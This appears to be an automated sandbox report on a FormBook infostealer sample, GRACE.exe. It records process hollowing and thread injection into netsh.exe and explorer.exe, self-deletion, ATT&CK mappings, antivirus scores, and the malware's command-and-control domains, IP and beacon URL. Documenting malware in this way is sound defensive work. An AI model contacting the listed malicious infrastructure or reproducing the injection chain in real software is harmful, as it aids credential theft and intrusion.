          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03734A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03713A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03708A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0370AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03714120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\GRACE.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\GRACE.exe; Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 216.250.110.35 80
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\GRACE.exe; Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\GRACE.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\netsh.exe; Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 16B0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\GRACE.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\GRACE.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\user\Desktop\GRACE.exe; Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: AD2008
Source: C:\Users\user\Desktop\GRACE.exe; Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\netsh.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: explorer.exe, 00000010.00000000.296358359.0000000001398000.00000004.00000020.sdmp; Binary or memory string: ProgmanamF
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp; Binary or memory string: Program Manager
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000010.00000000.296775597.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000011.00000002.630789652.0000000004B60000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\GRACE.exe; Queries volume information: C:\Users\user\Desktop\GRACE.exe VolumeInformation
Source: C:\Users\user\Desktop\GRACE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\GRACE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\GRACE.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: unknown; Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook (same Yara match sources as listed under Stealing of Sensitive Information)

Mitre Att&ck Matrix

Techniques per tactic; numbers in parentheses are the matrix's signature-count markers.

Initial Access: Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
Execution: Shared Modules (1), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
Persistence: Valid Accounts (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Process Injection (812), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Defense Evasion: Rootkit (1), Masquerading (1), Valid Accounts (1), Access Token Manipulation (1), Virtualization/Sandbox Evasion (3), Disable or Modify Tools (11), Process Injection (812), Deobfuscate/Decode Files or Information (1), Hidden Files and Directories (1), Obfuscated Files or Information (3), Software Packing (1)
Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
Discovery: Security Software Discovery (121), Virtualization/Sandbox Evasion (3), Process Discovery (2), Application Window Discovery (1), Remote System Discovery (1), System Information Discovery (112), Network Sniffing, Network Service Scanning, System Network Connections Discovery, Process Discovery, Permission Groups Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content, Replication Through Removable Media
Collection: Credential API Hooking (1), Archive Collected Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Exfiltration Over Physical Medium
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (3), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Service Stop

Behavior Graph

Behavior Graph ID: 344817; Sample: GRACE.exe; Start date: 27/01/2021; Architecture: WINDOWS; Score: 100

Start (node 2)
  DNS/IP: www.sterlworldshop.com; www.11sxsx.com; 5 other IPs or domains
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures
  started: GRACE.exe (node 11)

GRACE.exe (node 11; counters 15 and 4)
  Dropped files: C:\Users\user\AppData\...\AddInProcess32.exe (PE32); C:\Users\user\AppData\Local\...\GRACE.exe.log (ASCII)
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
  started: AddInProcess32.exe (node 15)

AddInProcess32.exe (node 15)
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
  injected: explorer.exe (node 18)

explorer.exe (node 18)
  DNS/IP: www.dl888.net (216.250.110.35, 49739, 80, DXTL-HKDXTLTseungKwanOServiceHK, Hong Kong); www.ludisenofloral.com; 3 other IPs or domains
  Signatures: System process connects to network (likely due to code injection or exploit)
  started: netsh.exe (node 22)

netsh.exe (node 22)
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  started: cmd.exe (node 25; counter 1)

cmd.exe (node 25)
  started: conhost.exe (node 27)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
GRACE.exe | 62% | Virustotal |
GRACE.exe | 16% | Metadefender |
GRACE.exe | 43% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
GRACE.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
10.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner | Label
www.luxusgrotte.com | 0% | Virustotal |
www.dl888.net | 4% | Virustotal |
shops.myshopify.com | 0% | Virustotal |
www.internetmarkaching.com | 1% | Virustotal |

          URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.luxusgrotte.com | 217.160.0.171 | true | false | | unknown
gfw.cloud301.net | 141.164.47.167 | true | false | | unknown
www.dl888.net | 216.250.110.35 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | false | | unknown
www.internetmarkaching.com | 104.21.69.246 | true | false | | unknown
www.hongreng.xyz | unknown | unknown | true | | unknown
www.ludisenofloral.com | unknown | unknown | true | | unknown
www.11sxsx.com | unknown | unknown | true | | unknown
www.sterlworldshop.com | unknown | unknown | true | | unknown
www.kornteengoods.com | unknown | unknown | true | | unknown
www.hotvidzhub.download | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.dl888.net/jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                            • Avira URL Cloud: safe
                            unknown
                            http://www.hotvidzhub.downloadReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ns.adobe.cobjGRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.sterlworldshop.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pki.goog/gsr2/GTS1O1.crt0GRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.dl888.net/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.hotvidzhub.download/jqc/www.kornteengoods.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.carterandcone.comlexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.sterlworldshop.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.registeredagentfirm.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.wlw-hnlt.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.11sxsx.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                              high
                              http://www.luxusgrotte.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.internetmarkaching.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fitdramas.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.11sxsx.com/jqc/www.luxusgrotte.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.novergi.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersGexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designers/?explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designers?explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.wlw-hnlt.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.wlw-hnlt.com/jqc/www.novergi.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.szyulics.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tiro.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.goodfont.co.krexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.ludisenofloral.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schema.org/WebPageGRACE.exe, 00000000.00000002.293213064.000000000286F000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.registeredagentfirm.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.internetmarkaching.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.typography.netDexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.novergi.com/jqc/www.quintred.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.kimberlygoedhart.netexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.novergi.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fonts.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.krexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fitdramas.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.sakkal.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.luxusgrotte.com/jqc/www.sterlworldshop.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.comexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.szyulics.com/jqc/Mexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.hotvidzhub.downloadexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.dl888.netReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.wlw-hnlt.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.dl888.netexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sterlworldshop.com/jqc/www.internetmarkaching.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.registeredagentfirm.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kornteengoods.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.quintred.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.hongreng.xyzReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.szyulics.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.founder.com.cn/cnexplorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fitdramas.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.internetmarkaching.com/jqc/www.registeredagentfirm.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.luxusgrotte.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fitdramas.com/jqc/www.szyulics.comexplorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.ludisenofloral.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.quintred.com/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.hotvidzhub.download/jqc/explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.kornteengoods.comReferer:explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://ns.ado/1GRACE.exe, 00000000.00000003.291474996.0000000008610000.00000004.00000001.sdmp, GRACE.exe, 00000000.00000003.215101178.0000000008601000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
216.250.110.35 | unknown | Hong Kong | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344817
Start date: 27.01.2021
Start time: 07:56:19
Joe Sandbox Product: CloudBasic
